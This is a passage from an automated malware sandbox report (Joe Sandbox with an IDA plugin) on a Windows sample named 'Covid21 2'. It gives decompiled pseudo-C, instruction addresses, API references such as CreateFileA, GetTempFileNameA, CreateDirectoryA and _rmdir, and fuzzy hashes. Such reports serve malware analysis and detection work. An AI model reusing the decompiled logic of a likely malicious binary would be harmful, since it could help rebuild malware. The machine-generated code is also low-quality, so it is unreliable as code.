										E00405EA0( *0x40b1cc); // executed
										_push( *0x40b3f8);
										_t59 =  *0x40b3f8; // 0x0
										E00403A79(__eflags,  *0x40b3f8);
										 *0x40b3f8 =  *0x40b3f8 + 1;
										_t143 =  *0x40a38c; // 0x29a06f0
										 *_t167 =  *_t167 + _t143;
										_t61 = E00405E15(_t59, _t59);
										 *0x40b3f8 =  *0x40b3f8 + 1;
										_t144 =  *0x40a38c; // 0x29a06f0
										 *_t167 =  *_t167 + _t144; // executed
										E00405E90(_t61,  *0x40b3f8); // executed
										_pop( *0x40b3f8);
										_push( *0x40b170); // executed
										L00403196(); // executed
										_push(0);
									}
								} else {
									_t64 =  *0x40b3f8; // 0x0
									_push(_t64);
									E00403A18(0x40b1e8, 0, _t64);
									 *0x40b3f8 =  *0x40b3f8 + 1;
									_t66 =  *0x40b3f8; // 0x0
									E00403DE0( *0x40b174,  *0x40b1b0);
									_t145 = _t66;
									_t125 = _t66;
									 *0x40b3f8 = _t125;
									_t126 = _t125 +  *0x40a38c;
									__eflags = _t145 +  *0x40a38c;
									E004074C0(_t125 +  *0x40a38c, _t145 +  *0x40a38c);
									if(__eflags == 0) {
										L21:
										_t69 = 0;
										__eflags = 0;
									} else {
										_t117 =  *0x40b1b4; // 0x0
										__eflags = _t117 - 1;
										if(_t117 != 1) {
											goto L21;
										} else {
											_t69 = 1;
										}
									}
									__eflags = _t69;
									if(__eflags == 0) {
										goto L32;
									} else {
										_t71 =  *0x40b3f8; // 0x0
										_t72 =  *0x40b3f8; // 0x0
										E00405DD5(__eflags, _t72);
										 *0x40b3f8 =  *0x40b3f8 + 1;
										_t147 =  *0x40a38c; // 0x29a06f0
										_v64 = _v64 + _t147;
										E004036F8(_t126, _t165,  *0x40b1a4, _t72, _t71);
										_t148 = _t71;
										E004030F0(0x40b1ec, _t148);
										_t149 =  *0x40b1ec; // 0x0
										_t122 = 0;
										__eflags = 0;
										E004074C0(0, _t149);
										if(__eflags != 0) {
											L31:
											_t77 =  *0x40b3f8; // 0x0
											_t78 =  *0x40b3f8; // 0x0
											E00403A79(__eflags,  *0x40b3f8);
											 *0x40b3f8 =  *0x40b3f8 + 1;
											_t150 =  *0x40a38c; // 0x29a06f0
											 *_t167 =  *_t167 + _t150;
											_t80 = E00405E15(_t78, _t78);
											 *0x40b3f8 =  *0x40b3f8 + 1;
											_t151 =  *0x40a38c; // 0x29a06f0
											 *_t167 =  *_t167 + _t151;
											E00405E90(_t80, _t77);
											 *0x40b3f8 = _t77;
											_push( *0x40b170);
											L00403196();
											_push(0);
										} else {
											_t152 =  *0x40b1ec; // 0x0
											_push( *0x40b3f8);
											E004074F0(_t152);
											_pop(_t153);
											E004030F0(0x40b168, _t153);
											_t154 =  *0x40b1e8; // 0x29a4e60
											_t122 = 0;
											__eflags = 0;
											E004074C0(0, _t154);
											if(__eflags == 0) {
												_push( *0x40b1e8);
												E00402130();
											}
											__eflags = E00406230(1,  *0x40b1cc);
											if(__eflags == 0) {
												L29:
												_push( *0x40b1cc);
												__eflags = E00406170(__eflags, 1);
												if(__eflags != 0) {
													E00406250(_t164, 1,  *0x40b1e4);
													E00405FD0(1);
												}
												goto L31;
											} else {
												E00405FD0(1);
												_push( *0x40b3f8);
												_t155 =  *0x40b194; // 0x29a0588
												E004074F0(_t155);
												E004074F0(0x40a010);
												_t157 =  *0x40b1cc; // 0x29a4f30
												E004074F0(_t157);
												E004074F0(0x40a010);
												_t159 =  *0x40b198; // 0x29a05a0
												E004074F0(_t159);
												 *0x40b3f8 =  *0x40b3f8 + 1;
												_t160 =  *0x40a38c; // 0x29a06f0
												_v64 = _v64 + _t160;
												_t97 = E004036A2( *0x40b190,  *0x40b3f8);
												 *0x40b3f8 = 0x24;
												 *0x40b1f0 = _t97;
												_t116 =  *0x40b1f0; // 0x0
												__eflags = _t116 - 7;
												if(__eflags != 0) {
													goto L29;
												} else {
													_t98 =  *0x40b3f8; // 0x0
													_t99 =  *0x40b3f8; // 0x0
													E00403A79(__eflags,  *0x40b3f8);
													 *0x40b3f8 =  *0x40b3f8 + 1;
													_t161 =  *0x40a38c; // 0x29a06f0
													 *_t167 =  *_t167 + _t161;
													_t101 = E00405E15(_t99, _t99);
													 *0x40b3f8 =  *0x40b3f8 + 1;
													_t162 =  *0x40a38c; // 0x29a06f0
													 *_t167 =  *_t167 + _t162;
													E00405E90(_t101, _t98);
													 *0x40b3f8 = _t98;
													_push( *0x40b170);
													L00403196();
													_push(0);
												}
											}
										}
									}
								}
							} else {
								_push(0x10);
								E004036A2( *0x40b180,  *0x40b18c);
								_push( *0x40b170);
								L00403196();
								_push(1);
							}
						}
					}
					L38:
					ExitProcess();
					HeapDestroy( *0x40b13c); // executed
					ExitProcess(??); // executed
					E00403B0B();
					E00403DB0(E00403CC0());
					E00404150();
					E00404A13(_t122);
					return E0040681C(E00406030());
				}
				_push( *0x40b170);
				L00403196();
				_push(0);
				goto L38;
			}




































































                                  0x004015f4
                                  0x004015f4
                                  0x00401689
                                  0x004015d1
                                  0x004015da
                                  0x00000000
                                  0x00000000
                                  0x004015fe
                                  0x00401601
                                  0x00401647
                                  0x0040164a
                                  0x00000000
                                  0x0040164c
                                  0x00401651
                                  0x00401657
                                  0x0040165a
                                  0x00000000
                                  0x0040165c
                                  0x0040165c
                                  0x00401668
                                  0x00401673
                                  0x00401674
                                  0x0040167e
                                  0x00401683
                                  0x00000000
                                  0x00401683
                                  0x0040165a
                                  0x00401603
                                  0x00401608
                                  0x0040160e
                                  0x00401611
                                  0x00000000
                                  0x00401613
                                  0x00401613
                                  0x0040161f
                                  0x0040162a
                                  0x0040162b
                                  0x00401635
                                  0x0040163a
                                  0x0040168f
                                  0x0040168f
                                  0x00401694
                                  0x0040169c
                                  0x004016a2
                                  0x004016a8
                                  0x004016ad
                                  0x004016b3
                                  0x004016c6
                                  0x004016cb
                                  0x004016cc
                                  0x004016cd
                                  0x004016d3
                                  0x004016d9
                                  0x004016df
                                  0x004016e4
                                  0x0040171f
                                  0x00401724
                                  0x00401726
                                  0x00401728
                                  0x0040172d
                                  0x0040172d
                                  0x00401732
                                  0x00401738
                                  0x0040173e
                                  0x00401744
                                  0x0040174a
                                  0x00401750
                                  0x00401756
                                  0x0040175c
                                  0x00401762
                                  0x00401768
                                  0x0040176d
                                  0x00401772
                                  0x00401780
                                  0x0040178b
                                  0x0040178c
                                  0x00401791
                                  0x00401796
                                  0x004017a4
                                  0x004017af
                                  0x004017b0
                                  0x004017c0
                                  0x004017c5
                                  0x004017c7
                                  0x00401a3c
                                  0x00401a3c
                                  0x00401a42
                                  0x00401a48
                                  0x00401a52
                                  0x00401a57
                                  0x00401a5d
                                  0x00401a62
                                  0x00401a68
                                  0x00401a69
                                  0x00401a6e
                                  0x00401a79
                                  0x00401a7e
                                  0x00401a80
                                  0x00401aa4
                                  0x00401aa9
                                  0x00401aae
                                  0x00401abf
                                  0x00401ac4
                                  0x00401aca
                                  0x00401ad2
                                  0x00401a82
                                  0x00401a8d
                                  0x00401a97
                                  0x00401adc
                                  0x00401ae2
                                  0x00401ae2
                                  0x00401ae4
                                  0x00401ae9
                                  0x00401aeb
                                  0x00401af1
                                  0x00401af1
                                  0x00401af6
                                  0x00401afc
                                  0x00401b02
                                  0x00401b08
                                  0x00401b0d
                                  0x00401b13
                                  0x00401b18
                                  0x00401b1e
                                  0x00401b24
                                  0x00401b2a
                                  0x00401b30
                                  0x00401b34
                                  0x00401b39
                                  0x00401b3f
                                  0x00401b4a
                                  0x00401b54
                                  0x00401b56
                                  0x00401b63
                                  0x00401b68
                                  0x00401b6e
                                  0x00401b74
                                  0x00401b77
                                  0x00401b7c
                                  0x00401b82
                                  0x00401b88
                                  0x00401b8b
                                  0x00401b90
                                  0x00401b96
                                  0x00401b9c
                                  0x00401ba4
                                  0x00401ba4
                                  0x004017cd
                                  0x004017cd
                                  0x004017d2
                                  0x004017d9
                                  0x004017de
                                  0x004017e4
                                  0x004017f7
                                  0x004017fc
                                  0x004017fd
                                  0x004017fe
                                  0x00401804
                                  0x0040180a
                                  0x00401810
                                  0x00401815
                                  0x00401829
                                  0x00401829
                                  0x00401829
                                  0x00401817
                                  0x00401817
                                  0x0040181d
                                  0x00401820
                                  0x00000000
                                  0x00401822
                                  0x00401822
                                  0x00401822
                                  0x00401820
                                  0x0040182b
                                  0x0040182d
                                  0x00000000
                                  0x00401833
                                  0x00401833
                                  0x0040183a
                                  0x00401841
                                  0x00401846
                                  0x00401852
                                  0x00401858
                                  0x0040185c
                                  0x00401867
                                  0x00401868
                                  0x0040186d
                                  0x00401873
                                  0x00401873
                                  0x00401875
                                  0x0040187a
                                  0x004019dd
                                  0x004019dd
                                  0x004019e4
                                  0x004019f1
                                  0x004019f6
                                  0x004019fc
                                  0x00401a02
                                  0x00401a05
                                  0x00401a0a
                                  0x00401a10
                                  0x00401a16
                                  0x00401a19
                                  0x00401a1e
                                  0x00401a24
                                  0x00401a2a
                                  0x00401a32
                                  0x00401880
                                  0x00401880
                                  0x00401886
                                  0x0040188c
                                  0x00401897
                                  0x00401898
                                  0x0040189d
                                  0x004018a3
                                  0x004018a3
                                  0x004018a5
                                  0x004018aa
                                  0x004018ac
                                  0x004018b2
                                  0x004018b2
                                  0x004018c7
                                  0x004018c9
                                  0x004019af
                                  0x004019af
                                  0x004019bf
                                  0x004019c1
                                  0x004019ce
                                  0x004019d8
                                  0x004019d8
                                  0x00000000
                                  0x004018cf
                                  0x004018d4
                                  0x004018d9
                                  0x004018e4
                                  0x004018f0
                                  0x004018fa
                                  0x004018ff
                                  0x00401905
                                  0x0040190f
                                  0x00401914
                                  0x0040191a
                                  0x0040191f
                                  0x0040192b
                                  0x00401931
                                  0x00401935
                                  0x0040193a
                                  0x00401940
                                  0x00401945
                                  0x0040194b
                                  0x0040194e
                                  0x00000000
                                  0x00401950
                                  0x00401950
                                  0x00401957
                                  0x00401964
                                  0x00401969
                                  0x0040196f
                                  0x00401975
                                  0x00401978
                                  0x0040197d
                                  0x00401983
                                  0x00401989
                                  0x0040198c
                                  0x00401991
                                  0x00401997
                                  0x0040199d
                                  0x004019a5
                                  0x004019a5
                                  0x0040194e
                                  0x004018c9
                                  0x0040187a
                                  0x0040182d
                                  0x004016e6
                                  0x004016e6
                                  0x004016f7
                                  0x004016fc
                                  0x00401702
                                  0x0040170a
                                  0x0040170a
                                  0x004016e4
                                  0x00401611
                                  0x00401bbb
                                  0x00401bbb
                                  0x00401bc6
                                  0x00401bcb
                                  0x00401bd0
                                  0x00401bda
                                  0x00401bdf
                                  0x00401be4
                                  0x00401bf3
                                  0x00401bf3
                                  0x004015dc
                                  0x004015e2
                                  0x004015ea
                                  0x00000000

                                  APIs
                                  • _rmdir.MSVCRT ref: 004015E2
                                  • _rmdir.MSVCRT ref: 00401702
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BBB
                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BC6
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BCB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ExitProcess_rmdir$DestroyHeap
                                  • String ID:
                                  • API String ID: 2349447675-0
                                  • Opcode ID: ae173b18bee318a8e6ee3c6bd9685daada826712dcb14547edc22c3fc5a19cf2
                                  • Instruction ID: 60e15e31e36ec4f341ea57578d9192aa5bb5f3c1abe7231800a78ac4dbabb27b
                                  • Opcode Fuzzy Hash: ae173b18bee318a8e6ee3c6bd9685daada826712dcb14547edc22c3fc5a19cf2
                                  • Instruction Fuzzy Hash: 98E0E57106460099D9407BB2A993A1D29689F8835EF10047FF582781E39A3D5651657F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401BAC, Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 577 401bac-401bcb FreeLibrary ExitProcess HeapDestroy ExitProcess
                                  C-Code - Quality: 35%
                                  			E00401BAC(void* __eax, void* __ecx) {
				void* _t12;

				_t12 = __ecx;
				FreeLibrary(??);
				_push(0);
				ExitProcess();
				HeapDestroy( *0x40b13c); // executed
				ExitProcess(??); // executed
				E00403B0B();
				E00403DB0(E00403CC0());
				E00404150();
				E00404A13(_t12);
				return E0040681C(E00406030());
			}




                                  0x00401bac
                                  0x00401bb1
                                  0x00401bb6
                                  0x00401bbb
                                  0x00401bc6
                                  0x00401bcb
                                  0x00401bd0
                                  0x00401bda
                                  0x00401bdf
                                  0x00401be4
                                  0x00401bf3

                                  APIs
                                  • FreeLibrary.KERNEL32 ref: 00401BB1
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BBB
                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BC6
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BCB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ExitProcess$DestroyFreeHeapLibrary
                                  • String ID:
                                  • API String ID: 2053948195-0
                                  • Opcode ID: 11df7a65c876ebf354b943cab2a5a00fea6b763c2f44af75c1fb0680a71a7411
                                  • Instruction ID: a76ebcc7f67d18b801f3b767a6748b9316446318bb46ef4dd2753a3a033da90a
                                  • Opcode Fuzzy Hash: 11df7a65c876ebf354b943cab2a5a00fea6b763c2f44af75c1fb0680a71a7411
                                  • Instruction Fuzzy Hash: 7AD095700A062080EA80BBF36813A4C2C1C8F88B8EF4580BFB141380E39E3C921416BF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406170, Relevance: 4.6, APIs: 3, Instructions: 72filememoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 580 406170-4061ab call 40662c CreateFileA 583 4061c6-4061c8 580->583 584 4061ad-4061c4 CreateFileA 580->584 585 406211-406216 583->585 586 4061ca-4061fd RtlAllocateHeap 583->586 584->583 584->585 589 406224-40622a 585->589 590 406218-40621f call 4066bb 585->590 587 406208-40620e 586->587 588 4061ff-406205 586->588 590->589
                                  C-Code - Quality: 100%
                                  			E00406170(void* __eflags, intOrPtr _a4) {
				CHAR* _v0;
				intOrPtr _v4;
				void** _t10;
				void* _t11;
				intOrPtr _t13;
				CHAR* _t19;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				void** _t23;

				_t20 =  *0x40b484; // 0x27d05a8
				_t10 = E0040662C(_t20, _a4);
				_t19 = _v0;
				_t23 = _t10; // executed
				_t11 = CreateFileA(_t19, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
				_t22 = _t11;
				if(_t22 != 0xffffffff) {
					L2:
					if(_t22 == 0) {
						goto L6;
					} else {
						 *_t23 = _t22;
						_t21 =  *0x40b13c; // 0x27d0000
						_t23[1] = RtlAllocateHeap(_t21, 0, 0x1000);
						_t23[2] = 0x1000;
						_t23[3] = 0;
						_t23[5] = 1;
						if(_v4 != 0xffffffff) {
							return _t22;
						} else {
							return _t23;
						}
					}
				} else {
					_t22 = CreateFileA(_t19, 0x40000000, 1, 0, 5, 0, 0);
					if(_t22 == 0xffffffff) {
						L6:
						if(_a4 == 0xffffffff) {
							_t13 =  *0x40b484; // 0x27d05a8
							E004066BB(_t13, _t23);
						}
						return 0;
					} else {
						goto L2;
					}
				}
			}













                                  0x00406174
                                  0x00406180
                                  0x00406185
                                  0x004061a2
                                  0x004061a4
                                  0x004061a6
                                  0x004061ab
                                  0x004061c6
                                  0x004061c8
                                  0x00000000
                                  0x004061ca
                                  0x004061cf
                                  0x004061d1
                                  0x004061e5
                                  0x004061e8
                                  0x004061ef
                                  0x004061f6
                                  0x004061fd
                                  0x0040620e
                                  0x00406200
                                  0x00406205
                                  0x00406205
                                  0x004061fd
                                  0x004061ad
                                  0x004061bf
                                  0x004061c4
                                  0x00406211
                                  0x00406216
                                  0x00406218
                                  0x0040621f
                                  0x0040621f
                                  0x0040622a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004061c4

                                  APIs
                                  • CreateFileA.KERNELBASE(00000000,C0000000,00000001,00000000,00000002,00000080,00000000,027D05A8,00000000,?,?,?,00000000,00401A7E,00000001,00000000), ref: 004061A4
                                  • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000005,00000000,00000000,?,?,?,00000000,00401A7E,00000001,00000000,00000000,0040A0C7), ref: 004061BD
                                  • RtlAllocateHeap.NTDLL(027D0000,00000000,00001000), ref: 004061DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CreateFile$AllocateHeap
                                  • String ID:
                                  • API String ID: 2813278966-0
                                  • Opcode ID: fd85d5c3d97d33bbbb50d1206920227a120f6e094763f4a604cbe65cb46f2769
                                  • Instruction ID: 000130b85e76915fa5d363925ece99765dbccc5cf3196bdbfab5f4711e28a0ca
                                  • Opcode Fuzzy Hash: fd85d5c3d97d33bbbb50d1206920227a120f6e094763f4a604cbe65cb46f2769
                                  • Instruction Fuzzy Hash: F211B67234030066D230AB69AD49F57B798D790B71F21872AF3A1BB2D1C7B6A8548768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405F13, Relevance: 4.5, APIs: 3, Instructions: 38stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 592 405f13-405f20 593 405f22-405f50 strncpy strlen 592->593 594 405f86 592->594 595 405f68-405f70 593->595 596 405f88-405f89 594->596 597 405f52-405f5a 595->597 598 405f72-405f84 CreateDirectoryA 595->598 599 405f66 597->599 600 405f5c-405f5f 597->600 598->596 599->595 600->599 601 405f61-405f64 600->601 601->598 601->599
                                  C-Code - Quality: 100%
                                  			E00405F13(char* _a4) {
				char _v8;
				char _v268;
				char* _t16;
				int _t18;
				char* _t20;
				char _t21;
				void* _t22;

				if(_a4 == 0) {
					return 0;
				}
				strncpy( &_v268, _a4, 0x104);
				_v8 = 0;
				_t16 = _t22 + strlen( &_v268) - 0x108;
				while(_t16 >  &_v268) {
					_t20 = _t16 - 1;
					_t21 =  *_t20;
					if(_t21 == 0x20 || _t21 == 0x5c || _t21 == 0x2f) {
						_t16 = _t20;
						continue;
					} else {
						break;
					}
				}
				 *_t16 = 0;
				_t18 = CreateDirectoryA( &_v268, 0); // executed
				return _t18;
			}










                                  0x00405f20
                                  0x00000000
                                  0x00405f86
                                  0x00405f31
                                  0x00405f3d
                                  0x00405f49
                                  0x00405f68
                                  0x00405f52
                                  0x00405f55
                                  0x00405f5a
                                  0x00405f66
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f5a
                                  0x00405f72
                                  0x00405f7e
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CreateDirectorystrlenstrncpy
                                  • String ID:
                                  • API String ID: 2535372781-0
                                  • Opcode ID: 01aa21823cffc10e34e7013d8b7c9e6cafb9b4a409ff1ea4c43c60d8ae1ca257
                                  • Instruction ID: 106eb3b8964d5d9676c23aae3fc3b966741f8cbe397171ba60076510be6c1ab0
                                  • Opcode Fuzzy Hash: 01aa21823cffc10e34e7013d8b7c9e6cafb9b4a409ff1ea4c43c60d8ae1ca257
                                  • Instruction Fuzzy Hash: 0701F9319086099EDB21DA24CC89BEB77799B10344F5400B6E5C4E21D1DBBC9BC8CF1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401BF4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 74%
                                  			E00401BF4(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				CHAR* _v20;
				CHAR* _v24;
				intOrPtr _v28;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t25;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr _t62;
				void* _t63;
				intOrPtr _t65;
				void* _t66;
				intOrPtr* _t67;
				void* _t69;

				_t69 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_v20 = E00403DC0(0x400);
				_t15 =  *0x40b3f8; // 0x0
				E00405EB2(_t69, _t15);
				_t59 = _t15;
				E004030F0( &_v20, _t59);
				GetTempFileNameA(_v20, 0x40a00d, 0, _v24);
				_t19 =  *0x40b3f8; // 0x0
				E00403E50(_v24, _t19);
				_t60 = _t19;
				E004030F0(0x40b170, _t60);
				E00403E30( *_t67);
				E00405EA0( *0x40b170); // executed
				E00405F13( *0x40b170);
				_t25 =  *0x40b3f8; // 0x0
				E00405DD5(_t69, _t25);
				_t61 = _t25;
				E004030F0(0x40b168, _t61);
				_push(E00403EA0(_v28));
				if(0 !=  *_t67) {
					__eflags = 1 - _v20;
					if(1 == _v20) {
						_v8 = 1;
					}
				} else {
					if(E00403EA0(_a4 + 1) == 1) {
						_push( *0x40b168);
						L00408011();
						_push( *0x40b3f8);
						E004074F0(0x40a00e);
						_t65 =  *0x40b168; // 0x29a4870
						E004074F0(_t65);
						_pop(_t66);
						E004030F0(0x40b16c, _t66);
					}
					_t62 =  *0x40b170; // 0x29a4838
					_push( *0x40b3f8);
					E004074F0(_t62);
					_pop(_t63);
					E004030F0(0x40b168, _t63);
					_v8 = 2;
				}
				 *0x40b160 = E00403EA0(_a4 + _v8);
				 *0x40b164 = E00403EA0(_a4 + _v8 + 1);
				return E00407550(1, _v12);
			}




















                                  0x00401bf4
                                  0x00401bf7
                                  0x00401bf8
                                  0x00401bf9
                                  0x00401c04
                                  0x00401c07
                                  0x00401c0e
                                  0x00401c17
                                  0x00401c18
                                  0x00401c2e
                                  0x00401c33
                                  0x00401c3e
                                  0x00401c49
                                  0x00401c4a
                                  0x00401c52
                                  0x00401c5d
                                  0x00401c68
                                  0x00401c6d
                                  0x00401c74
                                  0x00401c7f
                                  0x00401c80
                                  0x00401c8e
                                  0x00401c94
                                  0x00401d07
                                  0x00401d0a
                                  0x00401d0c
                                  0x00401d0c
                                  0x00401c96
                                  0x00401ca7
                                  0x00401ca9
                                  0x00401caf
                                  0x00401cb4
                                  0x00401cbf
                                  0x00401cc4
                                  0x00401cca
                                  0x00401cd5
                                  0x00401cd6
                                  0x00401cd6
                                  0x00401cdb
                                  0x00401ce1
                                  0x00401ce7
                                  0x00401cf2
                                  0x00401cf3
                                  0x00401cf8
                                  0x00401cf8
                                  0x00401d24
                                  0x00401d39
                                  0x00401d54

                                  APIs
                                    • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(00D40000,00000008,00000000), ref: 00403DD1
                                    • Part of subcall function 00405EB2: GetTempPathA.KERNEL32(00000104,00000000,00000104,004013CA,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                    • Part of subcall function 00405EB2: LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000), ref: 00405ED6
                                    • Part of subcall function 00405EB2: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                    • Part of subcall function 00405EB2: GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA), ref: 00405EF5
                                    • Part of subcall function 00405EB2: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000), ref: 00405EFA
                                  • GetTempFileNameA.KERNEL32(?,0040A00D,00000000,?,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000,00000000,00000000), ref: 00401C2E
                                    • Part of subcall function 00403E50: memcpy.MSVCRT ref: 00403E83
                                    • Part of subcall function 00403E30: HeapFree.KERNEL32(00D40000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                    • Part of subcall function 00405F13: strncpy.MSVCRT ref: 00405F31
                                    • Part of subcall function 00405F13: strlen.MSVCRT ref: 00405F41
                                    • Part of subcall function 00405F13: CreateDirectoryA.KERNELBASE(?,00000000), ref: 00405F7E
                                    • Part of subcall function 00405DD5: GetCurrentDirectoryA.KERNEL32(00000104,00000000,00000104,?,?,?,00000000,00401C79,00000000,00000000,?,00000000,00000000,?,0040A00D,00000000), ref: 00405DEB
                                    • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: DirectoryFreeHeapLibraryNamePathTempstrlen$AddressAllocateCreateCurrentFileLoadLongProcmemcpystrncpy
                                  • String ID: "*
                                  • API String ID: 4243183096-3137671172
                                  • Opcode ID: 5de984f9e461d23f3f0c4006e05cee6915a4fb818d52de746b579485cf50a481
                                  • Instruction ID: 51c46ce23f5c993c5dfa76041344c512df945007a9040ee44b4dad7dc5fa6996
                                  • Opcode Fuzzy Hash: 5de984f9e461d23f3f0c4006e05cee6915a4fb818d52de746b579485cf50a481
                                  • Instruction Fuzzy Hash: 9A3110701143019FC700EF75ED92A5B7B69EB44315F50483EB440B61B2CB39AD419B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004066F1, Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 650 4066f1-406737 RtlAllocateHeap * 2
                                  C-Code - Quality: 100%
                                  			E004066F1(signed int _a4) {
				signed int _v0;
				signed int _v4;
				signed int _t11;
				void* _t13;
				signed int _t16;
				signed int* _t18;

				_t18 = RtlAllocateHeap( *0x40b13c, 8, 0x20);
				_t11 = _v4;
				_t18[3] = _t18[3] & 0x00000000;
				_t18[4] = _a4;
				_t16 = _v0;
				 *_t18 = _t11;
				_t18[1] = _t16;
				_t18[2] = _t16;
